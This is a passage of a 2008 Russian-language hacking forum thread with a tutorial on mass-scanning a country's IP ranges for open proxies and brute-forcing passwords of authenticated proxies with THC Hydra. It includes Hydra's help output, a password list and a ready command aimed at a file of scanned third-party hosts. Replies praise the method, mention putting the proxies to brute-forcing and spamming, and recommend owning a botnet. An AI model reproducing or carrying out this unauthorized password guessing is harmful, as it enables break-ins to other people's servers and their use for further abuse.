Форум АНТИЧАТ
Страница 1 из 8 1 2 3 4 5 > Последняя »
Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Статьи (https://forum.antichat.xyz/forumdisplay.php?f=30)
-   -   Как добыть Proxy самому! (https://forum.antichat.xyz/showthread.php?t=58754)

te$t 15.01.2008 19:55
Как добыть Proxy самому!
 
[intro]
Обычно большинство из пользователей, достают прокси для брута, в публичных местах или покупают.
Но есть более разумный способ! :) Какой сприсите вы? Ответ прсть насканить самому... ;)
[Осматриваемся]
Итак для начала опредилимся в какой зоне находится наш дедик? К примеру дедик находится в зоне br (Бразилия) тогда я и буду искать проксы именно в данном регионе.
Идем на сайт http://www.completewhois.com/statist...ntry/rirstats/ и смотрим диапазоны ip адресов нужные нам. Как видите диапазон не из коротких :( и сканить мы его будем не одни сутки.
Здесь нам помогут публичные сайты выкладывающие проксы... К примеру шагаем на сайт http://www.aliveproxy.com и выбираем из списка нужный нам регион, хм.. не густо но зато мы видим на каких диапазонах сидят проксы :).
[Сканер]
Хорошо начало есть, а теперь нам нужен добротный сканер портов, в сети их огромное множество и каждый по своему хорош, но этого нам мало, нам нужен быстрый и главное качественный сканер. Многие из нас привыкли к одним сканерам, а другие предпочитают другие... Мой выбор пал на программу Dsns 10 , до него я испробовал огромное кол-во сканеров в которых по своему разочаровывался :( Angryip - к примеру, часто не видел проксов там где они есть, ProxyHunter - слишком медленный, но зато чекер из него самый рульный :), SuperScan - то-же глюкнутный :D. Теперь настало время для портов, хотя порты мы можем прпустить т.к. вы уже заметили, что всеми любимый ай-пи-ди(IPDBrut - всех версий) работает на стандартных портах - 80, 3128, 6588, 8080.
но всеже мы опять пойдем на http://www.aliveproxy.com и посмотрим какие обычно порты используют Бразильцы :).

Многое в данном посте пропущено, думаю дальше вам обьяснять не надо и вы сами допрете что делать...


[Подбираем пароль к PROXY]
Итак мы добыли проксов, с чем я вас и поздравляю! ;) Но всеравно хочется добыть быстрый прокс, с авторизацией т.е. вводишь логин, пасс и сидишь один с нормальной скоростью. Итак приступим. Данный способ не очень прост и требует много терпения, и времени.Так что не думайте. что прочитав данную статью вы сразу станете обладателем хорошего прокси сервера. Брутить мы будем диапазон ip - адрессов на один распрастраненный логин Administrator.

[Начнем]
Но наш выбор сегодня падет на программу hydra от команды THC
Hydraэто настоящая находка для хакера. Она умеет подбирать пароли к SSH, FTP,
MySQL, MS-SQL, POP3, IMAP, HTTP/HTTPS basic-auth, без проблем ломает пассы к
маршрутизаторам cisco и т.д.

Как видишь данная програма обладает целым набором хороших качеств, и может подобрать пароль к многим протоколам. Теперь нам нужен Password-лист (файл с паролями). Его можно создать как самому или скачать с любого хак ресурса.

В данной статье мы будем работать с win32 версией программы т.к те кто использует OS семейства LINUX или шелл то они уже знают че по чем. ;)

Для начала скачаем ее с офф. сайтаTHC
распакуем ее к примеру в директорию :
C:\hydra Примечание: Программа работает из командной строки
Как запустить командную строку ты наверное уже знаешь ;), а если нет то: Пуск\Выполнить\cmd.exe
Запустили, теперь переходим в папку с гидрой при помощи команды cd в данном случае
cd C:\hydra
запускаем гидру hydra.exe где она выведет нам полный список ключей и протоколов

Цитата:
C:\hydra>hydra.exe
Hydra v5.2 [http://www.thc.org] (c) 2006 by van Hauser / THC <vh@thc.org>

Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns]
[-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV]
server service [OPT]

Options:
-R restore a previous aborted/crashed session
-S connect via SSL
-s PORT if the service is on a different default port, define it here
-l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE
-p PASS or -P FILE try password PASS, or load several passwords from FILE
-e ns additional checks, "n" for null password, "s" try login as pass
-C FILE colon seperated "login:pass" format, instead of -L/-P options
-M FILE server list for parallel attacks, one entry per line
-o FILE write found login/password pairs to FILE instead of stdout
-f exit after the first found login/password pair (per host if -M)
-t TASKS run TASKS number of connects in parallel (default: 16)
-w TIME defines the max wait time in seconds for responses (default: 30)
-v / -V verbose mode / show login+pass combination for each attempt
server the target server (use either this OR the -M option)
service the service to crack. Supported protocols: [telnet ftp pop3 imap smb
smbnt http-head http-get https-head https-get http-proxy cisco cisco-enable vnc
ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs
snmp rsh cvs svn icq sapr3 ssh2 smtp-auth pcanywhere teamspeak sip vmauthd]
OPT some service modules need special input (see README!)

Use HYDRA_PROXY_HTTP/HYDRA_PROXY_CONNECT and HYDRA_PROXY_AUTH env for a proxy.
Hydra is a tool to guess/crack valid login/password pairs - use allowed only
for legal purposes! If used commercially, tool name, version and web address
must be mentioned in the report. Find the newest version at http://www.thc.org
где мы видим присутствие протокола http-proxy. Ну что же теперь создадим Password-list под названием pass.txt и наполним его наиболее распространенными паролями.
К примеру:

Цитата:
123
1234
12345
123456
1234567
!@#
!@#$
!@#$%
!@#$%^
!@#$%^&
qwerty
qwert
qwer
pass
password
Password
pAsSwOrD
PaSsWoRd
/.,
/.,m
/.,mn
/.,mnb
ну и так далее, все зависит от вашей фантазии, или качайте публичные пасс-листы из интернета.


теперь вбиваем:
hydra -s 8080 -l Administrator -P pass.txt -t 16 -M ip.txt http-proxy
Где
-s PORT if the service is on a different default port, define it here (порт)
-l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE (Логин который мы будем брутить) -L лист с логинами.
-p PASS or -P FILE try password PASS, or load several passwords from FILE
(-p один пасс, пасслист)
-t TASKS run TASKS number of connects in parallel (default: 16) кол-во потоков, по умолчанию 16.
-M FILE server list for parallel attacks, one entry per line (лист адрессов для перебора)

з.ы. Статья для новичков, многое пропущенно указаны лишь принцип работы брута =))) УДАЧНОГО БРУТА!

Используемый софт
1) СканерDsns10
2) Сканер и чеккер ProxyHunter
3) Brute THC-HYDRA

by te$t 2006г.

гейлордфакерЪ 21.01.2008 20:58
чуфствую тебя вдохновила тему по часто используемым паролям =/
+2 статья достояна от меня уважение
всё проверю на деле благодарю

MaSter GeN 27.01.2008 11:54
Очень интересная статья спасибо автору !!!! :D Но если честно то иногда проше купить проксей :rolleyes: при том что стоят они не так дорого да и кто знает что там за прокси, ведуться ли логи и не выдадут ли тебя при первом же запросе органов с потрахами ! :)

te$t 29.01.2008 13:34
Цитата:
Сообщение от MaSter GeN
Очень интересная статья спасибо автору !!!! :D Но если честно то иногда проше купить проксей :rolleyes: при том что стоят они не так дорого да и кто знает что там за прокси, ведуться ли логи и не выдадут ли тебя при первом же запросе органов с потрахами ! :)
Ну вот смотри, у тебя есть пара дедиков, один пустим под брут, а второй можно пустит под скан и насканить самому. Я не говорю что ты в один раз наберешь себе хороший списочек. К примеру из своенй практики, у меня хранится много сканов, примерно 1-2 месяца скана, где 30-40 тысяч ip адрессов. Теперь при необходимости я чекаю этот лист, и у меня при неоюходимости есть проксы для брути или работы в целом. Мне не приходится шерстить паблик проекты с проксами..... Т.е. я уже не покупаю, теперь даже со своего компа с ограниченым каналом я имею 6-7 PPS. Повторюсь, что способ не прост но он проверен и работает как часы. Теперь те проксы что у меня не прочекались, а просят авторизацию, я тупо бручу и серфю инет или качаю файлро с бесплатных фалообменников и не испытываю ни каких ограничений, тем более в некоторых случаях скорость загрузки(скачки) в разы превышает мою....

MaSter GeN 29.01.2008 17:25
Для серфа мона и скачки не спорю способ оптимальный но речь заходит о более или менее серьёздных вечах когда речь уже конкретно заходит о твоей безопасности и могут за это взять за попу если на проксе ведуться логи подключений вычеслить твой риал ип не составит труда !!
Нет я не спорю метод действенный хороший и работает!
Ну еще к вопросу о диапазонах заодим на любой ресурс тогуюших проксями имеюший свои бот неты и т.д регимся в обычно рега не платная а платные уже сами прокси смотрим лист проксей пока прокси не куплены данный лист мы видем в форме 74.56.23.***:***** вот нам и диапазон с хорошими платниками :)втыкаем всеэто дела на деда и сканим как описывалось выше автором :)А вообше иметь свой даже не большой бот нет это вообше оптимальный вариант :)

P.s Я конечно не спорю что я немного параноик :)

satana8920 30.01.2008 12:24
автору нессомнено плюс за эту статью! но вот до меня не доходит как этим прокси (запароленные) в брутер или спемар запихнуть???

fatal_bug 30.01.2008 17:10
Цитата:
Сообщение от satana8920
автору нессомнено плюс за эту статью! но вот до меня не доходит как этим прокси (запароленные) в брутер или спемар запихнуть???
ну по идее в программе должна присутствовать функция работы с прокси, требующими авторизацию, хотя большинство программ подобного рода заточены под прокси, не требующих авторизации

ZavodiJIo 31.01.2008 11:31
а где собстно слить прогу Dsns 10? ибо гугл непомог =(

RayzeR0 31.01.2008 11:43
Цитата:
а где собстно слить прогу Dsns 10? ибо гугл непомог =(
http://update.dsns.net/binaries/dsns123.zip

bublebuble 21.03.2008 02:09
не легче грабить прокси с сайтов и проверять их на рабочесть?


Время: 17:51
Страница 1 из 8 1 2 3 4 5 > Последняя »
Показывать 40 сообщений этой темы на одной странице